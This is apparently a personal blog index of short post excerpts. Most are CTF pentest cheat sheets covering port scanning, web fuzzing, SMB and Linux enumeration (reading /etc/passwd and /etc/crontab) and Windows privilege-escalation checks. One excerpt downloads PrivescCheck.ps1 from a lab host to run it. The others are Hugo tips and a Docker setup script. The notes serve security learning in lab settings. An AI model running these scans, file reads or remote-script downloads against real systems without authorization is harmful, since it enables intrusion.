Checklist

Quick guide for pentest CTFs like Boot2Roots.

Methodology: identify problem(s), gather info, analyze clues, test/iterate/repeat, and avoid common mistakes.

Wikis
- HackTricks
- AppSecExplained
- Red Team Notes

Blogs
- Overgrowncarrot1

Enumerate
- Open ports? rustscan, nmap.
- Running services? Version numbers?
- Operating System (Linux/Windows)?
- Domains? /etc/hosts
- Webserver (Apache/Nginx)?
- Subdomains?

DNS
    nslookup $domain
    dig $domain ANY

Common Files
- robots.txt
- sitemap.xml
- .htaccess
- security.txt
- manifest.json
- browserconfig.xml
- etc

PrivEsc
- sudo -l
- curl ^

Thanks for reading

1 min · 67 words · Ash

Enumeration

rustscan
    rustscan -a $ip -g
    rustscan -a $ip -p $ports -- -sC -sV | tee scan.init

nmap
    nmap -vv -Pn $ip
    nmap -vv -Pn -p $ports -A $ip

feroxbuster
    feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init

FFUF
    ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init

firefox
- Analysis: Whatruns, Wappalyzer
- /robots.txt, sitemap(.xml)

smb
    enum4linux $ipa | tee enum4.txt # smb shares

Linux Enumeration
    ls -la /home
    cat /etc/passwd
    cat /etc/crontab
    sudo -l # run sudo with?...

1 min · 107 words · Ash

Hugo

Full Supported Languages List

Alias(es)

Here’s what I use for my urls:

    url: hugo
    alias: # aliases for multiple
    - post/hugo
    -

But in order for aliases to work, I have to change alias to aliases, save. Then change it back to alias. Strange.

Markdown All in One

Hands down the best extension to use within VSCode is Markdown All in One.
- Paste links over text for automatic linking
- Continues ordered and unordered lists when typing

Working Checkbox Items

Add the below snippet to footer e....

1 min · 114 words · Ash

PowerShell

    whoami /priv
    whoami /all
    gci -recurse .
    gci -recurse -hidden .

Manual Enum
- C:\Users
- C:\
- C:\Windows\Temp

Auto Enum
- WinPEAS
- PrivescCheck (https://github.com/itm4n/PrivescCheck)
- . .\PrivescCheck.ps1; Invoke-PrivescCheck

Transfer
- wget http://$ip/ -UseBasicParsing -OutFile $file.ext

    wget http://10.4.59.208:8000/PrivescCheck.ps1 -UseBasicParsing -OutFile PrivescCheck.ps1

Thanks for reading

1 min · 46 words · Ash

Rustscan

Installing Docker. Bash script:

    #!/bin/bash

    # Update, install and enable Docker
    sudo apt update -y && sudo apt upgrade -y
    sudo apt install -y docker.io
    sudo systemctl enable docker --now

    # Add current user into docker group
    sudo usermod -aG docker $USER

    # Pull latest Rustscan
    docker pull rustscan/rustscan:latest

    # Create a ZSH Aliases File
    touch ~/.zsh_aliases

    # Add it to ZSH RC
    echo """if [ -f ~/.zsh_aliases ]; then ....

1 min · 143 words · Ash